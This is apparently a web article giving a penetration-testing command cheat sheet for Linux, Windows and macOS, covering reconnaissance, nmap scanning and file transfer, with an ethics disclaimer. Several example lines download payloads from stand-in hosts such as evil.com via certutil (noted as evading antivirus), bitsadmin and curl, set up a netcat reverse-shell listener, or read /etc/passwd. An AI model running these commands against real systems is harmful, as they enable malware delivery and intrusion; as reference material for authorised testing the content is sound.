Hacker Terminal Cheat Sheet: Essential Commands for Ethical Hacking

The command line interface (CLI) is the fundamental tool in the arsenal of any cybersecurity professional, ethical hacker, or penetration tester. While powerful graphical tools exist, understanding and mastering the terminal allows for greater flexibility, automation, and a deeper understanding of system interactions.

This cheat sheet provides a quick reference to essential commands across different operating systems, categorized by their typical use in a penetration testing lifecycle. Please note: This guide is intended for educational purposes only, for use in authorized penetration testing, security auditing, and learning environments. Misuse of these commands against systems without explicit permission is illegal and unethical.


Linux (Kali Linux, Ubuntu, etc.)

Linux distributions like Kali Linux are the go-to for most cybersecurity professionals due to their robust toolsets and open-source nature.

I. Information Gathering & Reconnaissance

| Command | Description | Example Usage |
| --- | --- | --- |
| `whoami` | Displays the current effective username. | `whoami` |
| `uname -a` | Shows detailed Linux kernel information (OS, hostname, kernel). | `uname -a` |
| `ls` / `ls -la` | List directory contents (-a for hidden, -l for details). | `ls -la /home/user/` |
| `pwd` | Print working directory (shows current location). | `pwd` |
| `cat <file>` | Displays the content of a file. | `cat /etc/passwd` |
| `grep <pattern> <file>` | Searches for patterns in files. | `grep "admin" /var/log/auth.log` |
| `find <path> -name <name>` | Searches for files and directories. | `find / -name "config.php"` |
| `history` | Shows command history of the current user. | `history` |
| `ps aux` | Displays all running processes on the system. | `ps aux` |
| `crontab -l` | Lists scheduled cron jobs for the current user. | `crontab -l` |
| `df -h` | Reports file system disk space usage (-h for human-readable). | `df -h` |

II. Network Scanning & Analysis

| Command | Description | Example Usage |
| --- | --- | --- |
| `ping <target>` | Tests connectivity to a host. | `ping google.com` |
| `ip a` / `ifconfig` | Displays network interface configuration (IP addresses, etc.). | `ip a` |
| `netstat -tulnp` | Lists listening TCP/UDP ports and associated processes. | `netstat -tulnp` |
| `traceroute <target>` | Traces the route packets take to a host. | `traceroute 8.8.8.8` |
| `dig <domain> A` | DNS lookup for A (address) records. | `dig example.com A` |
| `nmap -sS <target>` | Stealth (SYN) port scan. | `nmap -sS 192.168.1.1` |
| `nmap -sV <target>` | Service version detection scan. | `nmap -sV 192.168.1.1` |
| `nmap -O <target>` | OS detection scan. | `nmap -O 192.168.1.1` |
| `nmap -p- <target>` | Scans all 65535 ports. | `nmap -p- 192.168.1.1` |
| `nmap -A <target>` | Aggressive scan (OS, service, script, traceroute). | `nmap -A 192.168.1.1` |
| `nc -lvnp <port>` | Netcat listener (simple listener for reverse shells). | `nc -lvnp 4444` |
| `nc <target> <port>` | Netcat client (connects to a port). | `nc 192.168.1.10 80` |

III. File Transfer & Management

| Command | Description | Example Usage |
| --- | --- | --- |
| `wget <URL>` | Downloads files from the web. | `wget http://example.com/malware` |
| `curl <URL>` | Transfers data from or to a server. | `curl -O http://example.com/file.txt` |
| `scp <source> <destination>` | Securely copies files between hosts. | `scp user@remote:/path/file .` |
| `python3 -m http.server` | Starts a simple Python HTTP server for file transfer. | `python3 -m http.server 8000` |

Windows (Command Prompt / PowerShell)

Windows commands are crucial for enumerating targets and often for post-exploitation activities. PowerShell is increasingly powerful.

I. Information Gathering & Reconnaissance

| Command | Description | Example Usage |
| --- | --- | --- |
| `whoami` | Displays current user information. | `whoami` |
| `systeminfo` | Shows detailed system configuration information. | `systeminfo` |
| `ver` | Displays the Windows version. | `ver` |
| `dir` | Lists directory contents. | `dir C:\Users\Public` |
| `type <file>` | Displays the content of a text file. | `type C:\Windows\system.ini` |
| `tasklist` | Lists all running processes. | `tasklist /svc` |
| `net user` | Lists local user accounts. | `net user` |
| `net localgroup` | Lists local groups and their members. | `net localgroup administrators` |
| `schtasks /query /fo LIST /v` | Displays scheduled tasks. | `schtasks /query /fo LIST /v` |
| `driverquery` | Lists installed device drivers. | `driverquery` |
| `wmic qfe get Caption,HotFixID,InstalledOn` | Lists installed hotfixes (patches). | `wmic qfe get Caption,HotFixID,InstalledOn` |

II. Network Scanning & Analysis

| Command | Description | Example Usage |
| --- | --- | --- |
| `ping <target>` | Tests network connectivity. | `ping 192.168.1.1` |
| `ipconfig /all` | Displays full TCP/IP configuration. | `ipconfig /all` |
| `netstat -ano` | Displays active network connections, listening ports, PID. | `netstat -ano` |
| `tracert <target>` | Traces the route to a destination. | `tracert google.com` |
| `nslookup <domain>` | Queries DNS servers for domain name information. | `nslookup example.com` |
| `net view` | Displays network resources (computers, shares). | `net view` |
| `net use` | Manages network connections to shared resources. | `net use \\192.168.1.1\share` |
| `netsh firewall show state` | Shows Windows Firewall status. | `netsh firewall show state` |
| `Get-NetIPConfiguration` (PS) | (PowerShell) Displays network configuration. | `Get-NetIPConfiguration` |
| `Test-NetConnection` (PS) | (PowerShell) Tests network connectivity and port reachability. | `Test-NetConnection -ComputerName google.com -Port 443` |

III. File Transfer & Management

| Command | Description | Example Usage |
| --- | --- | --- |
| `certutil.exe -urlcache -f <URL> <outfile>` | Downloads a file using certutil.exe (often bypasses AV). | `certutil.exe -urlcache -f http://evil.com/mal.exe mal.exe` |
| `bitsadmin /transfer <job_name> <URL> <outfile>` | Downloads files using BITSAdmin (background intelligent transfer service). | `bitsadmin /transfer mydownload http://evil.com/file.txt C:\file.txt` |
| `copy <source> <destination>` | Copies files. | `copy C:\temp\exploit.exe \\share\exploit.exe` |

macOS (Terminal)

macOS, being Unix-based, shares many commands with Linux, but also has its own unique utilities.

I. Information Gathering & Reconnaissance

| Command | Description | Example Usage |
| --- | --- | --- |
| `whoami` | Displays the current effective username. | `whoami` |
| `sw_vers` | Shows macOS version information. | `sw_vers` |
| `sysctl -n kern.version` | Displays kernel version. | `sysctl -n kern.version` |
| `ls` / `ls -la` | List directory contents (-a for hidden, -l for details). | `ls -la /Users/Shared` |
| `pwd` | Print working directory (shows current location). | `pwd` |
| `cat <file>` | Displays the content of a file. | `cat /etc/hosts` |
| `grep <pattern> <file>` | Searches for patterns in files. | `grep "admin" /var/log/system.log` |
| `find <path> -name <name>` | Searches for files and directories. | `find /Users -name "*.kext"` |
| `ps aux` | Displays all running processes on the system. | `ps aux` |
| `launchctl list` | Lists loaded launchd jobs (services, agents). | `launchctl list` |
| `df -h` | Reports file system disk space usage (-h for human-readable). | `df -h` |

II. Network Scanning & Analysis

| Command | Description | Example Usage |
| --- | --- | --- |
| `ping <target>` | Tests connectivity to a host. | `ping 192.168.1.1` |
| `ifconfig` | Displays network interface configuration (IP addresses, etc.). | `ifconfig en0` |
| `netstat -an` | Lists active network connections and listening ports. | `netstat -an` |
| `traceroute <target>` | Traces the route packets take to a host. | `traceroute 8.8.8.8` |
| `dig <domain> A` | DNS lookup for A (address) records. | `dig example.com A` |
| `/usr/sbin/networksetup -listallnetworkservices` | Lists all network services. | `/usr/sbin/networksetup -listallnetworkservices` |
| `/usr/sbin/networksetup -getinfo "Wi-Fi"` | Gets detailed information for a specific network service. | `/usr/sbin/networksetup -getinfo "Wi-Fi"` |
| `lsof -i` | Lists open files and network connections. | `sudo lsof -i :80` |
| `/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s` | Scans for available Wi-Fi networks. | `/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s` |

III. File Transfer & Management

| Command | Description | Example Usage |
| --- | --- | --- |
| `curl <URL>` | Transfers data from or to a server. | `curl -O http://evil.com/file.txt` |
| `wget <URL>` | Downloads files from the web (may need to be installed via Homebrew). | `wget http://example.com/malware` |
| `scp <source> <destination>` | Securely copies files between hosts. | `scp user@remote:/path/file .` |

Important Ethical Hacking Principles:

  • Always Get Permission: Never use these commands on systems or networks you do not own or have explicit written permission to test. Unauthorized access is illegal.
  • Scope Definition: Clearly define the scope of your penetration test before you begin.
  • Documentation: Document every command, every finding, and every step of your process.
  • Legal & Ethical Boundaries: Operate strictly within legal and ethical boundaries.
  • Knowledge is Power (and Responsibility): Understand the impact of each command before you execute it.

This cheat sheet serves as a starting point. The world of ethical hacking is vast and constantly evolving. Continuous learning, practice in controlled environments, and a strong ethical compass are the true keys to becoming a proficient and responsible cybersecurity professional.


***
Note on Content Creation: This article was developed with the assistance of generative AI like Gemini or ChatGPT. While all public AI strives for accuracy and comprehensive coverage, all content is reviewed and edited by human experts at IsoSecu to ensure factual correctness, relevance, and adherence to our editorial standards.